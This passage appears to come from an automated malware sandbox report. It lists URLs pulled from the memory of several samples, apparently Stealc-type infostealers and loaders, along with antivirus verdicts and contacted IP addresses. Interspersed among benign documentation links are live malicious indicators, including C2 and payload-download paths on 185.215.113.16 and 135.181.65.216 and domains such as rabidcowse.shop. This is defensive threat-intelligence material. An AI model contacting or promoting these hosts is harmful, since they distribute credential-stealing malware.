                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameclient_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CD50000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyclient_jackbastadguy.exe, 00000017.00000002.2806006559.000002103E7E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://pancakedipyps.click/apiZlegs.exe, 0000000A.00000003.2556447078.000000000142B000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2561121566.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    http://csrc.nist.gov/publications/nistpoclient_jackbastadguy.exe, 00000017.00000003.2765739149.000002103D958000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781548241.000002103D95A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776435894.000002103D959000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764071442.000002103D950000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773693170.000002103D959000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785963640.000002103D95B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://pypi.org/project/build/).client_jackbastadguy.exe, 00000017.00000002.2802348249.000002103DB60000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802583057.000002103DD60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://wwww.certigna.fr/autorites/0mclient_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777680443.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805065822.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774888505.000002103DF6D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerclient_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772532063.000002103B52D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781869058.000002103B52E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771472232.000002103B4EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctastealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2612262377.0000000009902000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549807905.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainclient_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleclient_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesclient_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CD50000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.ecosia.org/newtab/legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://rabidcowse.shop/ve9taq_gold1111111111.exe, 00000013.00000003.2582249708.0000000003406000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://cryptography.io/en/latest/installation/client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76client_jackbastadguy.exe, 00000017.00000002.2803647306.000002103E0E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://github.com/pypa/setuptools/issues/417#issuecomment-392298401client_jackbastadguy.exe, 00000017.00000002.2801243888.000002103D760000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://135.181.65.216/4a21a126be249f0d/vcruntime140.dll26be249f0d/nss3.dllstealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            http://185.215.113.16/Jo89Ku7d/index.php0750001axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.cert.fnmt.es/dpcs/client_jackbastadguy.exe, 00000017.00000003.2797603763.000002103E1C6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2763762799.000002103E1A1000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2804865848.000002103E1C6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776512105.000002103E1B0000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1AF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781599529.000002103E1B1000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779701716.000002103E1B0000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782413791.000002103E1C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://google.com/mailclient_jackbastadguy.exe, 00000017.00000003.2787855784.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784009746.000002103E0F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781952523.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776999972.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772329883.000002103E012000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787345849.000002103E0F7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://img.shields.io/pypi/v/importlib_metadata.svgclient_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://rabidcowse.shop/apiNgold1111111111.exe, 00000013.00000003.2596814803.0000000005C38000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000002.2624913938.0000000005C38000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2622925716.0000000005C38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  https://pancakedipyps.click/88legs.exe, 0000000A.00000003.2497003981.0000000001393000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  https://github.com/pyca/cryptography/issuesclient_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://html4/loose.dtdliddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://rabidcowse.shop/apiXgold1111111111.exe, 00000013.00000003.2546865742.0000000005C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      		unknown
                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specclient_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://github.com/urllib3/urllib3/issues/2920client_jackbastadguy.exe, 00000017.00000002.2802583057.000002103DD60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://rabidcowse.shop/apiogold1111111111.exe, 00000013.00000002.2623881290.000000000339E000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2622240824.000000000339E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataclient_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772532063.000002103B52D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781869058.000002103B52E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771472232.000002103B4EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770618625.000002103B4D6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779572439.000002103B52E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://135.181.65.216/ee45b7c5e4cb75cb.php;Astealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                		unknown
                                                                                                                                                http://www.quovadisglobal.com/cps0client_jackbastadguy.exe, 00000017.00000002.2803647306.000002103E0E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://sexo.gofile.fun/obtenciondeplaticaxxxxmiakhalifazclient_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2793117132.000002103DF90000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755825443.000002103DF89000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803382451.000002103DF90000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755548768.000002103DF84000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2754264393.000002103DF8C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787410720.000002103DF90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://x1.c.lencr.org/0legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://x1.i.lencr.org/0legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://cryptography.io/en/latest/changelog/client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://pancakedipyps.click///mlegs.exe, 0000000A.00000003.2434050002.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2434306736.0000000003C9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        		unknown
                                                                                                                                                        https://mail.python.org/mailman/listinfo/cryptography-devclient_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://objects.githubusercontent.com/github-production-release-asset-2e65be/910997785/34bbe59b-8804axplong.exe, 00000005.00000003.2453828190.0000000000AE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://objects.githubusercontent.com/github-production-release-asset-2e65be/911427352/1d7d7595-2252axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.2696969753.0000000005AD6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allgold1111111111.exe, 00000013.00000003.2549269233.000000000603B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://.jpgliddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://185.215.113.16/Jo89Ku7d/index.php32axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcaclient_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://github.com/pypa/setuptools/issues/1024.client_jackbastadguy.exe, 00000017.00000002.2802348249.000002103DB60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://ocsp.accv.es0client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776138025.000002103E14E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://135.181.65.216/4a21a126be249f0d/nss3.dllqA;stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.quovadisglobal.com/cpsclient_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahliddad.exe, 00000015.00000002.2659798097.00000000006D9000.00000004.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://www.openssl.org/Hclient_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2816918875.00007FFE02D1A000.00000002.00000001.01000000.00000023.sdmp, client_jackbastadguy.exe, 00000017.00000002.2810547911.00007FFDFB667000.00000002.00000001.01000000.00000021.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://135.181.65.216/4a21a126be249f0d/freebl3.dllkKstealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://cryptography.ioclient_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://pypi.org/project/cryptography/client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://github.com/psf/requests/pull/6710client_jackbastadguy.exe, 00000017.00000002.2806118937.000002103EA0C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml.execlient_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://github.com/pyca/cryptography/actions?query=workflow%3ACIclient_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://pancakedipyps.click/legs.exe, 0000000A.00000003.2554435563.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2471224699.0000000003C9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://tools.ietf.org/html/rfc2388#section-4.4client_jackbastadguy.exe, 00000017.00000003.2779787225.000002103D991000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764071442.000002103D950000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773075995.000002103D990000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785024324.000002103D996000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103D963000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://curl.se/docs/hsts.htmlliddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitationsclient_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://www.dabeaz.com/ply)01Rclient_jackbastadguy.exe, 00000017.00000002.2805687091.000002103E490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://ocsp.accv.esclient_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776138025.000002103E14E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778242180.000002103E164000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://185.215.113.16/Jo89Ku7d/index.php4axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://httpbin.org/getclient_jackbastadguy.exe, 00000017.00000002.2805888391.000002103E6A0000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782552772.000002103E19D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-accessclient_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF14000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755825443.000002103DF89000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765497236.000002103DF8D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755548768.000002103DF84000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF6F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2754264393.000002103DF8C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeclient_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B4D4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731418768.000002103B53A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731260902.000002103B52B000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CDD8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://185.215.113.16/inc/legs.exeaxplong.exe, 00000005.00000002.2980326735.0000000000A36000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://wwww.certigna.fr/autorites/client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gzclient_jackbastadguy.exe, 00000017.00000003.2777953270.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775297088.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770927694.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779753706.000002103D8F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2736144327.000002103D937000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782256764.000002103D907000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2736144327.000002103D8F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high

                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                172.217.18.14
                                                                                                                                                                                                                		play.google.comUnited States
                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                172.67.156.127
                                                                                                                                                                                                                		rabidcowse.shopUnited States
                                                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                142.250.185.164
                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                34.197.122.172
                                                                                                                                                                                                                		httpbin.orgUnited States
                                                                                                                                                                                                                		14618AMAZON-AESUSfalse
